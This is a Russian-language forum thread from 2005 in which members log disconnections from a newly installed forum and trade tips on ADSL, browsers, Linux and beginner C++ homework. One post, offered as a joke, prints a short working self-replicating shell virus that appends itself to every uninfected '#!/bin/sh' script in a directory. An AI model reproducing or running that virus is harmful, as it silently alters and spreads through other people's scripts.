PDA

View Full Version : Не пацаны, так дело не пойдёт.



Olezhik
02-10-2005, 01:58 AM
Предлагаю устроить маленкую перекличку вылетов из форума. Всё что нужно делать это писать в этой теме кажды раз когда вы вылетаете из форума. Может в этой теме нам удасца убедить висшие инстанций, что форум и в правду глючит и так поехали....

Olezhik
02-10-2005, 02:00 AM
02/09/2005 11:55 PМ

Anna Arina
02-10-2005, 02:07 AM
смотри, наш сервер в Швеции, а вчера глючило по-страшному, а поручик из Питера/ от меня 300-400 км\ - у него всё было оК!
а меня выкидывало вчера и страницы грузились как на российских сайтах- долго и нудно.. сейчас лучше, но и то..не то!10:06 ам\европа/

LaFemmeGavrila
02-10-2005, 02:07 AM
Олежик, меня тогда за флуд выгонят, я вылетаю раз в 2 минуты в среднем, хых

Vitta
02-10-2005, 02:21 AM
Это ж нада такое терпение .. я бы уже забила

Olezhik
02-10-2005, 02:27 AM
Олежик, меня тогда за флуд выгонят, я вылетаю раз в 2 минуты в среднем, хыхНевыганят...
Свободу слова ещё никто не отменял..

Демократию отменили, пусть хоть свободу слова оставят народу!


12:27 АМ Апять слетел....

Olezhik
02-10-2005, 02:41 AM
12:41 AM 02/10/2005

Порyчик
02-10-2005, 04:45 AM
Олежик, Ты кукисы (cookies) все приемлешь? Если да, то значит у тебя, возможно, слишком навороченный Firewall или его настройки?

Lyubimaya
02-10-2005, 04:48 AM
А я ни разу не вылетала еще(тьфу 3 раза),только м-е-е-е-тттленнн-о-о-о-о гру-у-узится-я-я

Parachuter
02-10-2005, 04:49 AM
Олежик, Ты кукисы (cookies) все приемлешь? Если да, то значит у тебя, возможно, слишком навороченный Firewall или его настройки?
всё, но полностью вылетел....
а вы чё все на диал-ап сидите?

Порyчик
02-10-2005, 04:52 AM
всё, но полностью вылетел....
а вы чё все на диал-ап сидите?

я - да. :10:

Parachuter
02-10-2005, 05:06 AM
я - да. :10:
у меня выделенка. Я-то думаю чё это все вылетают, а я нет... Хотя тормозит иногда, но редко...
Всё-таки выделенка лучше. У меня ещё ADSL модем есть - с ним тоже иногда палево выходит...

Жалоба
02-10-2005, 05:15 AM
не , вроде не вылетала, но иногда странно медленно грузится, очень странно...

Порyчик
02-10-2005, 05:37 AM
у меня выделенка. Я-то думаю чё это все вылетают, а я нет... Хотя тормозит иногда, но редко...
Всё-таки выделенка лучше. У меня ещё ADSL модем есть - с ним тоже иногда палево выходит...
ADSL - штука коллективная. Из-за меня одного в подъезд кабель не потащат, или это влетит в копейку. Даелапимся покамест. :)

Parachuter
02-10-2005, 05:43 AM
ADSL - штука коллективная. Из-за меня одного в подъезд кабель не потащат, или это влетит в копейку. Даелапимся покамест. :)
АДСЛ - это не выделенка.
Доступ через АДСЛ модем осуществляется по телефонной линии, просто скорость сопоставима со скоростью выделенки и телефон не занят, так-как телефонный сигнал передаётся в другом спектре по медной жиле.
Так что плати 60 баков за АДСЛ модем и сплиттер, потом за подключение провайдеру и пользуйся наздоровье. В условиях невозможности проведения выделенки доступ через АДСЛ модем - это лучшая альтернатива ;)

Жалоба
02-10-2005, 05:54 AM
а у нас и телефона-то нет.... кабель... и кастрюлька-тто не моя (ц) :grum:

Порyчик
02-10-2005, 06:04 AM
АДСЛ - это не выделенка.
Доступ через АДСЛ модем осуществляется по телефонной линии, просто скорость сопоставима со скоростью выделенки и телефон не занят, так-как телефонный сигнал передаётся в другом спектре по медной жиле.
Так что плати 60 баков за АДСЛ модем и сплиттер, потом за подключение провайдеру и пользуйся наздоровье. В условиях невозможности проведения выделенки доступ через АДСЛ модем - это лучшая альтернатива ;)
Cпасибо за совет. Расмотрим. Мне казалось, все равно надо что-то тянуть. Рассмотрим.:)

tia_buena
02-10-2005, 06:37 AM
Предлагаю устроить маленкую перекличку вылетов из форума. Всё что нужно делать это писать в этой теме кажды раз когда вы вылетаете из форума. Может в этой теме нам удасца убедить висшие инстанций, что форум и в правду глючит и так поехали....
вчера глючило не только форум но и чат , сегодня всё оккейно :bis:

tia_buena
02-10-2005, 06:39 AM
Олежик, меня тогда за флуд выгонят, я вылетаю раз в 2 минуты в среднем, хых давай я тебя подержу, чтоб не летал :kiss:

Lustful Angel
02-10-2005, 07:54 AM
Cпасибо за совет. Расмотрим. Мне казалось, все равно надо что-то тянуть. Рассмотрим.:)

Поручик, в Москве такое 150 уёв стоит. Стрим называется. А так, ежели интересно - сходите www.stream.ru (http://www.stream.ru)

Lustful Angel
02-10-2005, 07:56 AM
Тока я боюсь, что это только в Москве.

КошЫчка
02-10-2005, 08:30 AM
Да форум глючит однозначно.. дома на своём DSL слетаю каждые минут 20 а на раборе каждая странице грузитса по пять минут... на нервы действует..:28:

Монашка
02-10-2005, 09:07 AM
вы конечно можете в меня кидаться гнилыми помидорами и т.п., но у меня все в порядке (ТТТ)

КошЫчка
02-10-2005, 09:24 AM
вы конечно можете в меня кидаться гнилыми помидорами и т.п., но у меня все в порядке (ТТТ)

имееш :grum:

http://www.russianamerica.com/common/gfx/ny/private-1377~42955/gf_12535.jpg

Clavelina
02-10-2005, 09:26 AM
Переодически бывает,что выкидывает с форума.

Монашка
02-10-2005, 09:30 AM
имееш :grum:

http://www.russianamerica.com/common/gfx/ny/private-1377~42955/gf_12535.jpggaaaaaaaaaaaaaaaaaaaaaaaaa (c)

Порyчик
02-10-2005, 10:04 AM
Поручик, в Москве такое 150 уёв стоит. Стрим называется. А так, ежели интересно - сходите www.stream.ru (http://www.stream.ru)

Ну, почему, вот например http://webplus.ru/ Но и на стрим.ру и на вебплас есть такая опция - проверка номера телефона. Если твоей АТС (первые 3 цифры телефона) там нет - свободен. Я пока свободен.

Но они все время подключают новые АТС. Будем ждать.

Порyчик
02-10-2005, 10:08 AM
Результат проверки

Ваша телефонная линия пока НЕ ВХОДИТ в диапазон подключенных номеров. Но Вы уже сейчас можете оформить свою заявку, поскольку очередность установки оборудования ADSL на городских АТС зависит от количества поданных заявок.

Krakadil
02-10-2005, 10:11 AM
Ни на работе Т1/IE ни дома кобель/Firefox не выбрасывает.

Иногда долго грузится страничка и получается как будто она прыгает.
Долго грузится едитор.

Белый_Волк
02-10-2005, 10:33 AM
Предлагаю устроить маленкую перекличку вылетов из форума. Всё что нужно делать это писать в этой теме кажды раз когда вы вылетаете из форума. Может в этой теме нам удасца убедить висшие инстанций, что форум и в правду глючит и так поехали....

:shlap: Привет всем ! Вылетать не вылетал но чат хмм:rtyu: очень странно работал виснул я своих сообщений почти не видел приходилось перезагружать чат ( в чём проблема та была )

не подскажете

КошЫчка
02-10-2005, 10:37 AM
<ИМГ цласс=инлинеимг титле=:шлап: алт="" срц="хттп://форум.руссианамерица.цом/ф/имагес/смилиес/с2/шлап.гиф" бордер=0 смилиеид="99"> Привет всем ! Вылетать не вылетал но чат хмм:rtyu: очень странно работал виснул я своих сообщений почти не видел приходилось перезагружать чат ( в чём проблема та была )




не подскажете

Эта была правакация субсидированая мадЫратарами этого форума гаааааааааааааааа http://smileys.smileycentral.com/cat/36/36_6_4.gif

цепной_кот
02-10-2005, 11:04 AM
Кто-нибудь, объясните мне пожалуйста, что такое "летать". Желательно наглядно, с демонстрацией. :roll:

У меня раз в два-три часа Иксплорер говорит - "ашипка, я больше не могу", и закрывает несколько окон, иногда все, в том числе те что к форуму отношения не имеют. До нового форума такого не было. Происходит как правило когда нажимаю на что-то в форуме, не дождавшись прорисовки страницы - а рисуюцца они, собаки, долго. Остальные приложения работают намано. Снова запускаю Иксплорер, вхожу в форум (логина нетреба, сам всё помнит) - и как ни в чём не бывало. Это и называецца "летать"? :roll:
:fly:

КошЫчка
02-10-2005, 11:06 AM
Кто-нибудь, объясните мне пожалуйста, что такое "летать". Желательно наглядно, с демонстрацией. :roll:


У меня раз в два-три часа Иксплорер говорит - "ашипка, я больше не могу", и закрывает несколько окон, иногда все, в том числе те что к форуму отношения не имеют. До нового форума такого не было. Происходит как правило когда нажимаю на что-то в форуме, не дождавшись прорисовки страницы - а рисуюцца они, собаки, долго. Остальные приложения работают намано. Снова запускаю Иксплорер, вхожу в форум (логина нетреба, сам всё помнит) - и как ни в чём не бывало. Это и называецца "летать"? :roll:


:fly:

#1 Аналогичная проблема из домУ
#2 ТЫ У НАС СПАШИВАЕШь???!!! Хто тут мадЫратор та????? :grum:

tia_buena
02-10-2005, 11:13 AM
Кто-нибудь, объясните мне пожалуйста, что такое "летать". Желательно наглядно, с демонстрацией. :ролл:

У меня раз в два-три часа Иксплорер говорит - "ашипка, я больше не могу", и закрывает несколько окон, иногда все, в том числе те что к форуму отношения не имеют. До нового форума такого не было. Происходит как правило когда нажимаю на что-то в форуме, не дождавшись прорисовки страницы - а рисуюцца они, собаки, долго. Остальные приложения работают намано. Снова запускаю Иксплорер, вхожу в форум (логина нетреба, сам всё помнит) - и как ни в чём не бывало. Это и называецца "летать"? :ролл:
:флы: Аффигеть ну просто аффиигеть у меня такого нет , может разница во времени :(

цепной_кот
02-10-2005, 11:40 AM
#1 Аналогичная проблема из домУ
#2 ТЫ У НАС СПАШИВАЕШь???!!! Хто тут мадЫратор та????? :grum: Блин... Не я же софт писал... И даже не я устанавливал... Р-р-р-р-р-р-р... Ну и потом, раз в три часа - not a big deal... Вон Гаврила с Олежиком летают каждые 10 минут если не чаще... Нет чтоб синхронно...

Lustful Angel
02-10-2005, 11:42 AM
Я тожы часто литаю...:angel:

Thomas
02-10-2005, 11:45 AM
Я тожы часто литаю...:ангел:

У меня тоже часто...Выпадает..когда за собой не слежу :oops:

цепной_кот
02-10-2005, 11:47 AM
У меня тоже часто...Выпадает..когда за собой не слежу :oops: :grum: :grum: ....

КошЫчка
02-10-2005, 11:47 AM
Блин... Не я же софт писал... И даже не я устанавливал... Р-р-р-р-р-р-р... Ну и потом, раз в три часа - нот а биг деал... Вон Гаврила с Олежиком летают каждые 10 минут если не чаще... Нет чтоб синхронно...

Ниругайси! http://smileys.smileycentral.com/cat/4/4_2_109v.gif
И патом не три часа.. меня каждые минут 20 кидаит.. а то и чащи.. может даже с Алежикам и Гаффрилкай синхронна

http://smileys.smileycentral.com/cat/36/36_3_9.gif

Olezhik
02-10-2005, 11:48 AM
Кто-нибудь, объясните мне пожалуйста, что такое "летать". Желательно наглядно, с демонстрацией. :roll:

У меня раз в два-три часа Иксплорер говорит - "ашипка, я больше не могу", и закрывает несколько окон, иногда все, в том числе те что к форуму отношения не имеют. До нового форума такого не было. Происходит как правило когда нажимаю на что-то в форуме, не дождавшись прорисовки страницы - а рисуюцца они, собаки, долго. Остальные приложения работают намано. Снова запускаю Иксплорер, вхожу в форум (логина нетреба, сам всё помнит) - и как ни в чём не бывало. Это и называецца "летать"? :roll:
:fly:


Да имено это и есть летать.... Вчера что то форум разошол, а обычно летаю не чяще чем один раз в чяс...

На качелях...
02-10-2005, 12:00 PM
У меня, как у Кота, вылетаю нечасто, иногда пару раз в день, иногда совсем нет. На мозилле не вылетаю совсем, но долго грузится форма ответа.

Aвгур
02-10-2005, 12:08 PM
у Меня похожая проблема. Бывает такое, что во время моего путешетвия по форуму - вдруг выползает сообщение, что у меня какой то еррор. Как результат - форум закрывается. После этого нормально пользоваться форумом не получается - страница загружается НЕСКОЛьКО МИНУТ и любой переход из темы на тему отнимает минимум минуту. В таких случая помогает только перезагрузка компьютера. НО КАК НЕ ХОЧЕТСЯ ПОСТОЯННО ПЕРЕГРУЖАТьСЯЯЯЯЯЯ:mads:

Манюня
02-10-2005, 12:08 PM
А я вот ни разу не вылетала, тьфу-тьфу-тьфу (ниче что я тута наплевала?). Все, учапала на работу, всем салют.

Карина
02-10-2005, 01:04 PM
А я ни разу не вылетала еще(тьфу 3 раза),только м-е-е-е-тттленнн-о-о-о-о гру-у-узится-я-я:cry: :priv:

LIL
02-10-2005, 04:32 PM
У меня, как у Кота, вылетаю нечасто, иногда пару раз в день, иногда совсем нет. На мозилле не вылетаю совсем, но долго грузится форма ответа.

Да, эта форма ответа просто припарила. По 5 минут гружу ее.:mads:

цепной_кот
02-10-2005, 05:19 PM
Да, эта форма ответа просто припарила. По 5 минут гружу ее.:mads: Можно выключить её и посмотреть как будет. ЛИЛ, если возражений нет, я её выключу.

Pandusika
02-10-2005, 05:34 PM
Кто-нибудь, объясните мне пожалуйста, что такое "летать". Желательно наглядно, с демонстрацией. :roll:

У меня раз в два-три часа Иксплорер говорит - "ашипка, я больше не могу", и закрывает несколько окон, иногда все, в том числе те что к форуму отношения не имеют. До нового форума такого не было. Происходит как правило когда нажимаю на что-то в форуме, не дождавшись прорисовки страницы - а рисуюцца они, собаки, долго. Остальные приложения работают намано. Снова запускаю Иксплорер, вхожу в форум (логина нетреба, сам всё помнит) - и как ни в чём не бывало. Это и называецца "летать"? :roll:
:fly:

У меня тоже самое :evillaugh

LaFemmeGavrila
02-10-2005, 05:34 PM
каждый рас нада залагиниватца

Sarochka
02-10-2005, 05:35 PM
каждый рас нада залагиниватца

Гаврила, тебе не привыкать дрочить, гааааааааааааа, шутка, гаааааааааа

Zovite kak Hotite
02-10-2005, 05:41 PM
у меня время от времени вылезает Erorrrrrrrrrr а потом страничка (internet explorer) с форумом закрывается.

Zovite kak Hotite
02-10-2005, 07:09 PM
5.08..
выкинуло на фиг.. бла бла.

КошЫчка
02-10-2005, 07:15 PM
5.08..
выкинуло на фиг.. бла бла.

8:13 pm same sh@t

Alter Ego
02-11-2005, 12:02 AM
1:00 am

Alter Ego
02-11-2005, 01:39 AM
2:34 am

sergey4jc
02-11-2005, 01:42 AM
2:34 am
1:42 am

parf
02-11-2005, 01:46 AM
у меня время от времени вылезает Erorrrrrrrrrr а потом страничка (internet explorer) с форумом закрывается.

1. getfirefox.com

2. install linux

3. #2

sergey4jc
02-11-2005, 01:51 AM
1. getfirefox.com

2. install linux

3. #2
Firefox is maybe cool but it opens forum much longer then IE, I don't care about errors, firefox is cool when I search for something or downloading multiple stuff!!!! HOw it feels to use Linux?

Olezhik
02-11-2005, 02:33 AM
Firefox is maybe cool but it opens forum much longer then IE, I don't care about errors, firefox is cool when I search for something or downloading multiple stuff!!!! HOw it feels to use Linux?
Пока ненаучишся как Лэимир, а потом как бог, а все остальные лэимиры :bis:

sergey4jc
02-11-2005, 02:59 AM
Пока ненаучишся как Лэимир, а потом как бог, а все остальные лэимиры :bis:
Хе хе! Ну здорово лэймер :28: :grum:

parf
02-11-2005, 03:11 AM
Firefox is maybe cool but it opens forum much longer then IE, I don't care about errors, firefox is cool when I search for something or downloading multiple stuff!!!! HOw it feels to use Linux?

1. alenware.com
2. get FC3 from http://fedora.redhat.com/
it works even on x-64
4way/16GB cpu feels cool

sergey4jc
02-11-2005, 03:13 AM
1. alenware.com
2. get FC3 from http://fedora.redhat.com/
it works even on x-64
4way/16GB cpu feels cool
Sorry but I'm fine with XP Pro., more secured and all applications are working fine>>> maybe some BS but I'm ok and not compplaining what I have! Wish u luck though:)!!!

Olezhik
02-11-2005, 03:18 AM
Хе хе! Ну здорово лэймер :28: :grum: Примерно с такого я начинал учить ЮНИКС :)


for i in * #virus#
do case "`sed 1q $i`" in
"#!/bin/sh")
grep '#virus#' $i >/dev/null ||
sed -n '/#virus#/,$p' $0 >>$i
esac
done 2>/dev/null



Вобщем "Hello World!" одним словом.

sergey4jc
02-11-2005, 03:19 AM
Примерно с такого я начинал учить ЮНИКС :)


for i in * #virus#
do case "`sed 1q $i`" in
"#!/bin/sh")
grep '#virus#' $i >/dev/null ||
sed -n '/#virus#/,$p' $0 >>$i
esac
done 2>/dev/null



Вобщем "Hello World!" одним словом.
Ну и чё думаешь об этом всём семействе?

Olezhik
02-11-2005, 03:22 AM
Ну и чё думаешь об этом всём семействе?Думаю в жизни всё прегодица.

sergey4jc
02-11-2005, 03:27 AM
#include "stdafx.h"
#include <iostream>
using namespace std;

int main()
{
int lowestNumber = 1;
int highestNumber = 1000;
int number;
int mod2;
int mod3;
char Enter;
char answer = 'y';
while(answer != 'n' && answer != 'N')
{
if (answer == 'y' || answer == 'Y')
{
cout << "\nPlease enter a number from "
<<lowestNumber<<"
"<<highestNumber<<": ";
cin >> number;
cin.get(Enter);
if(number >= lowestNumber && number <=
highestNumber) //number is within range
{
mod2 = number%2;
mod3 = number%3;

if(mod2 == 0 || mod3 == 0)
{
cout << "\n Your number " <<
number << " is divisible by ";
if(mod2 == 0) cout << "2 !";
if(mod3 == 0) cout << "3 !";
}
}
else
{
cout << "\n Your number is out of range!! ";
}
}
cout << "\n Want to go again? y = yes, n = no ";
cin >> answer;
cin.get(Enter);
}
cout << "\n\nBye Bye! Press ENTER to exit...";
cin.get(Enter);
return 0;
}
Сначала я выучу C++! До тебя мне явно далеко,

Olezhik
02-11-2005, 03:35 AM
#include "stdafx.h"
#include <iostream>
using namespace std;

int main()
{
int lowestNumber = 1;
int highestNumber = 1000;
int number;
int mod2;
int mod3;
char Enter;
char answer = 'y';
while(answer != 'n' && answer != 'N')
{
if (answer == 'y' || answer == 'Y')
{
cout << "\nPlease enter a number from "
<<lowestNumber<<"
"<<highestNumber<<": ";
cin >> number;
cin.get(Enter);
if(number >= lowestNumber && number <=
highestNumber) //number is within range
{
mod2 = number%2;
mod3 = number%3;

if(mod2 == 0 || mod3 == 0)
{
cout << "\n Your number " <<
number << " is divisible by ";
if(mod2 == 0) cout << "2 !";
if(mod3 == 0) cout << "3 !";
}
}
else
{
cout << "\n Your number is out of range!! ";
}
}
cout << "\n Want to go again? y = yes, n = no ";
cin >> answer;
cin.get(Enter);
}
cout << "\n\nBye Bye! Press ENTER to exit...";
cin.get(Enter);
return 0;
}
Сначала я выучу C++! До тебя мне явно далеко,


Ну если ты так быстро такую игру написал, то ты красавиц, меня уже давно обогнал. Яб никогда в жизни такое не предумал бы.

sergey4jc
02-11-2005, 03:37 AM
Ну если ты так быстро такую игру написал, то ты красавиц, меня уже давно обогнал. Яб никогда в жизни такое не предумал бы.
нет это домашка Олега, я только начил учить, и сёдня класса не было блин сидел дома книжку читал и ковырялся сам. И хорош прикалываться, а то я не виже чё ты знаешь а чё нет:) :knopka:

Olezhik
02-11-2005, 03:50 AM
нет это домашка Олега, я только начил учить, и сёдня класса не было блин сидел дома книжку читал и ковырялся сам. И хорош прикалываться, а то я не виже чё ты знаешь а чё нет:) :knopka::34: :34: Шучю я, проста домашка мне показалась смешно, не в том смысле как написано, а в самой её прегодности. Хотя так все и начинают, сам такое писал...

sergey4jc
02-11-2005, 03:59 AM
:34: :34: Шучю я, проста домашка мне показалась смешно, не в том смысле как написано, а в самой её прегодности. Хотя так все и начинают, сам такое писал...
Да это детам дошкольного возраста пару минут поиграться в отгадай число и им помоему и этого не надо!

Zovite kak Hotite
02-11-2005, 01:07 PM
выкунуло
11.05 ам.
бла бла.

Zovite kak Hotite
02-11-2005, 01:09 PM
1. getfirefox.com

2. install linux

3. #2


не хОчу линукс. Он меня еще в коледже достал.
Я теперь думаю как в виндоуз, а в линуксе было трудно перебороть виндовские привычки.

Zovite kak Hotite
02-11-2005, 01:12 PM
#include "stdafx.h"
#include <iostream>
using namespace std;

int main()
{
int lowestNumber = 1;
int highestNumber = 1000;
int number;
int mod2;
int mod3;
char Enter;
char answer = 'y';
while(answer != 'n' && answer != 'N')
{
if (answer == 'y' || answer == 'Y')
{
cout << "\nPlease enter a number from "
<<lowestNumber<<"
"<<highestNumber<<": ";
cin >> number;
cin.get(Enter);
if(number >= lowestNumber && number <=
highestNumber) //number is within range
{
mod2 = number%2;
mod3 = number%3;

if(mod2 == 0 || mod3 == 0)
{
cout << "\n Your number " <<
number << " is divisible by ";
if(mod2 == 0) cout << "2 !";
if(mod3 == 0) cout << "3 !";
}
}
else
{
cout << "\n Your number is out of range!! ";
}
}
cout << "\n Want to go again? y = yes, n = no ";
cin >> answer;
cin.get(Enter);
}
cout << "\n\nBye Bye! Press ENTER to exit...";
cin.get(Enter);
return 0;
}
Сначала я выучу C++! До тебя мне явно далеко,


еееее С++ неплохой язык. :)
Правда я не очень граммотный программист.

Olezhik
02-11-2005, 01:35 PM
еееее С++ неплохой язык. :)
Правда я не очень граммотный программист.
А хде ты видел храмотны програмистов? Пасатри на мою граматику ...


11:35 АМ СЛЕТЕЛ :(

sergey4jc
02-11-2005, 01:38 PM
А хде ты видел храмотны програмистов? Пасатри на мою граматику ...


11:35 АМ СЛЕТЕЛ :(
Да уж у мыня с громатикой тыже шото туго со всем! Здорово Олег!

1:37 дня заплыл!

Zovite kak Hotite
02-11-2005, 01:48 PM
А хде ты видел храмотны програмистов? Пасатри на мою граматику ...


11:35 АМ СЛЕТЕЛ :(


если верхняя прога написана тобой, то вроде все правильно написано.
Только в конце, что бы не убежал черный екран, нужно добавить одно словечко... getch();
:) А в библиотеке #include <conio.h>

А так все вроде номано написано.
А для чего там #include "stdafx.h" Что ето за хедафайл такой?

sergey4jc
02-11-2005, 01:52 PM
// stdafx.cpp : source file that includes just the standard includes
// stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"

// TODO: reference any additional headers you need in STDAFX.H
// and not in this file
To make Screen not flush away it's suppose to be

cin.get () <==could be Enter inside so it will wait untill you press the button but this way you need to proclaim a
char (Enter);

Zovite kak Hotite
02-11-2005, 01:54 PM
// stdafx.cpp : source file that includes just the standard includes
// stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"

// TODO: reference any additional headers you need in STDAFX.H
// and not in this file
To make Screen not flush away it's suppose to be

cin.get () <==could be Enter inside so it will wait untill you press the button but this way you need to proclaim a
char (Enter);

санькс. Бум знать.
Я по привычке использую getch();
я же говорю, неграмотный я програмист.

sergey4jc
02-11-2005, 01:55 PM
Программа та тупая на multiple choice, Отгадай число:) Зато прикольно!

Zovite kak Hotite
02-11-2005, 01:57 PM
вылет произвела в 11.55 ам.
бла бла.

Zovite kak Hotite
02-11-2005, 01:58 PM
Программа та тупая на multiple choice, Отгадай число:) Зато прикольно!


да, я такую писала по учебе, помню. :)
Правда я уже не програмировала где то больше года. Так что даже пришлось слазить за книжкой, что бы посмотреть, что я писала раньше.

Zovite kak Hotite
02-11-2005, 02:18 PM
12.15 pm
Улет произвела по полной программе.

Olezhik
02-11-2005, 02:22 PM
санькс. Бум знать.
Я по привычке использую гетч();


я же говорю, неграмотный я програмист. Тока решил что то умное написать, а Серёга уже обогнал...

Zovite kak Hotite
02-11-2005, 05:38 PM
3.37 pm

вылет произвела. Полет нормальный

sergey4jc
02-11-2005, 05:44 PM
Тока решил что то умное написать, а Серёга уже обогнал...
Олега а в СИ++ можно задавать координаты для выведения чего нибудь на экран - чтобы типа в середине надпись была, или так спэйсами и ковылять?

Zovite kak Hotite
02-11-2005, 05:51 PM
Олега а в СИ++ можно задавать координаты для выведения чего нибудь на экран - чтобы типа в середине надпись была, или так спэйсами и ковылять?


да. Можно.
Как.. не помню, хоть тресни.
Посмотрите в книге <C++ in 21 days> - неплохая книженция.
или <C++ builder.> Автор: Savitch.
Последняя по английский отлично написана и хорошие обьяснения.

Zovite kak Hotite
02-11-2005, 06:19 PM
4.18. pm
вылет произведен.

Zovite kak Hotite
02-11-2005, 06:54 PM
4.52 pm
вылет произведен

цепной_кот
02-11-2005, 09:30 PM
Пытаемся уменьшить частоту "полётов", сделали изменения по всему форуму:
1) выключили форму "быстрого ответа"
2) поставили "период кэширование постов" на два дня (раньше было - ноль)

1-е, надеемся, уменьшит "полёты", 2-е - ускорит работу форума, прорисовку страниц. Дайте, пожалуйста, нам знать ваши ощущения - изменилось ли что-нибудь. Спасибо!

Zovite kak Hotite
02-11-2005, 10:20 PM
8.18 pm
ощущения полета теже
При ответе немного дольше грузится окошко для ответа

Zovite kak Hotite
02-11-2005, 10:34 PM
8.33 pm
почему люди не летают как птицы? (ц)
летают, летают....

Pandusika
02-11-2005, 11:55 PM
9:45 :fly:

Olezhik
02-12-2005, 02:51 AM
12:50 AM

Clavelina
02-12-2005, 09:01 AM
18:00 (московское время)

Anna Arina
02-12-2005, 09:06 AM
ни разу не выбросило за два последних дня..

Anna Arina
02-12-2005, 03:11 PM
на каждую страницу- заход по полминуты.. на общение - не могу попасть уже 5 минут23:10, вечер, европпа

sergey4jc
02-12-2005, 04:39 PM
4:37 вылетел раз пятый за день уже!!!

КошЫчка
02-12-2005, 05:27 PM
Пытаемся уменьшить частоту "полётов", сделали изменения по всему форуму:
1) выключили форму "быстрого ответа"
2) поставили "период кэширование постов" на два дня (раньше было - ноль)




1-е, надеемся, уменьшит "полёты", 2-е - ускорит работу форума, прорисовку страниц. Дайте, пожалуйста, нам знать ваши ощущения - изменилось ли что-нибудь. Спасибо!

Люба, я тебе свои ощущения в личном порядке расскажу.. лана? :grum:

Olezhik
02-12-2005, 06:58 PM
4:58 pm

Olezhik
02-12-2005, 07:31 PM
5:31 pm

Alter Ego
02-12-2005, 08:44 PM
Люба, я тебе свои ощущения в личном порядке расскажу.. лана? :grum:Можно запасаться попкорном?

КошЫчка
02-12-2005, 10:44 PM
Меня опять скинуло.. 11:43 pm EST

КошЫчка
02-12-2005, 10:45 PM
Можно запасаться попкорном?

за просмотр денюшки платють :47:

Clavelina
02-13-2005, 03:14 AM
12.16(время московское)

sergey4jc
02-13-2005, 03:16 AM
3:16 am (Central US time)

sergey4jc
02-13-2005, 03:17 AM
12.16(время московское)
НАс с тобой в одно и тоже время выкинуло:)

Olezhik
02-13-2005, 09:48 AM
Блин и чего я не сплю.... 7:48 AM

Clavelina
02-13-2005, 11:59 AM
21.00 )время московское

McMan
02-13-2005, 02:16 PM
11:15 pm Moscow

Olezhik
02-13-2005, 02:21 PM
12:21 PM

Clavelina
02-14-2005, 04:29 AM
13.30 ВЕМЯ московское

solnechnaya
02-14-2005, 05:01 AM
сегодня вообще невозможно на форуме находится:plach: постоянно выкидывает, но в списке пользователей он лайн остаюсь.... и зайти обратно могу только спустя как минимум 5 мин могу, и то с проблемами...

Gazon_Zaseyan
02-14-2005, 05:06 AM
сегодня вообще невозможно на форуме находится:plach: постоянно выкидывает, но в списке пользователей он лайн остаюсь.... и зайти обратно могу только спустя как минимум 5 мин могу, и то с проблемами...

заходи в чат... по****ачим.. :)))))

solnechnaya
02-14-2005, 05:11 AM
заходи в чат... по****ачим.. :)))))

со мной сейчас опасно разговаривать.... у меня кризис душевный... нагрубить могу и обидеть... не хочу, в другой раз, хорошо?
Пы. Сы::remybussi

Revekka
02-14-2005, 12:17 PM
А я никогда не вылетаю... :hmm: Хотя с чата кидает постоянно, причем! на самом любопытном месте.... аах, как трудно потом на ту же волну настроиться :1:

Olezhik
02-14-2005, 12:26 PM
А я никогда не вылетаю... :hmm: Хотя с чата кидает постоянно, причем! на самом любопытном месте.... аах, как трудно потом на ту же волну настроиться :1: А меня из чата никогда в жизни не выкидывало, хотя отсюда вот тока что вылетел...
10:25

Zovite kak Hotite
02-14-2005, 01:43 PM
покамесь не выкидывает, НО!!!!...
пропадают названия тем. Т.е. на главной страницы форума (на пример). Загружаю, темы есть, 5 секунд, тем нет.. приходится рефрешить и темы опять есть.
Ето что такое ?

Zovite kak Hotite
02-14-2005, 02:53 PM
12.52 pm
лечу.......

цепной_кот
02-14-2005, 04:14 PM
Люба, я тебе свои ощущения в личном порядке расскажу.. лана? :grum: Когда, когда? (умильно высунув язык, подергивая хвостом и слегка выпустив когти)

цепной_кот
02-14-2005, 04:15 PM
Пытаемся уменьшить частоту "полётов", сделали изменения по всему форуму:
1) выключили форму "быстрого ответа" ... Похоже, "быстрый ответ" не влияет ни на что - включили обратно.

Olezhik
02-14-2005, 04:35 PM
Похоже, "быстрый ответ" не влияет ни на что - включили обратно.А у меня он никогда небыл включён....

Zovite kak Hotite
02-14-2005, 04:56 PM
2.55 pm
вылет....

theraflu
02-14-2005, 05:18 PM
вылетаю постоянно.:mads: Практичаски всегда когда перехожу из одной темы в другую.

цепной_кот
02-14-2005, 05:27 PM
А у меня он никогда небыл включён.... А его вроде выключить самому нельзя... :hmm: наверно у тя просто Джава отключена...

Olezhik
02-14-2005, 05:37 PM
А его вроде выключить самому нельзя... :hmm: наверно у тя просто Джава отключена...

Да нет, JS не отключина...
http://forum.russianamerica.com/f/attachment.php?attachmentid=189&stc=1

цепной_кот
02-14-2005, 06:14 PM
Да нет, JS не отключина... В правом нижнем углу каждого поста есть кнопка http://forum.russianamerica.com/f/images/buttons/quickreply.gif (http://forum.russianamerica.com/f/newreply.php?do=newreply&p=477959), справа от кнопки http://forum.russianamerica.com/f/images/buttons/quote.gif (http://forum.russianamerica.com/f/newreply.php?do=newreply&p=477959). Нажми на http://forum.russianamerica.com/f/images/buttons/quickreply.gif (http://forum.russianamerica.com/f/newreply.php?do=newreply&p=477962), тебя сразу должно "спустить " на "Быстрый ответ". В принципе удобная вещь, когда нужно быстро ответить.

Olezhik
02-14-2005, 06:26 PM
Thanks...Век живи век учись....

Olezhik
02-14-2005, 07:05 PM
5:02PM


502 Connection Failed

This Web page could not be opened. There may be too many people accessing this page or the page may be unavailable. Please try again later.

Zovite kak Hotite
02-14-2005, 09:51 PM
7.50 pm
вылетела

Zovite kak Hotite
02-14-2005, 10:11 PM
8.10 pm
А я лечу, а я лечу.....

На качелях...
02-14-2005, 10:52 PM
Выбрасывает раз или два в день. Эксплорер выдает сообщение об ошибке и закрывает окно. Обычно, как у Кота, когда кликаю на что-то, не дождавшись загрузки страницы.

parf
02-15-2005, 12:22 AM
5:02PM


502 Connection Failed

This Web page could not be opened. There may be too many people accessing this page or the page may be unavailable. Please try again later.

очень очень странно -
завтра посмотрим limits повысим

попробуем что-то типа
http://www.nuclearelephant.com/projects/dosevasive/

parf
02-15-2005, 12:22 AM
Выбрасывает раз или два в день. Эксплорер выдает сообщение об ошибке и закрывает окно. Обычно, как у Кота, когда кликаю на что-то, не дождавшись загрузки страницы.

1. setup firefox
2. setup opera

parf
02-15-2005, 12:31 AM
очень очень странно -
завтра посмотрим limits повысим

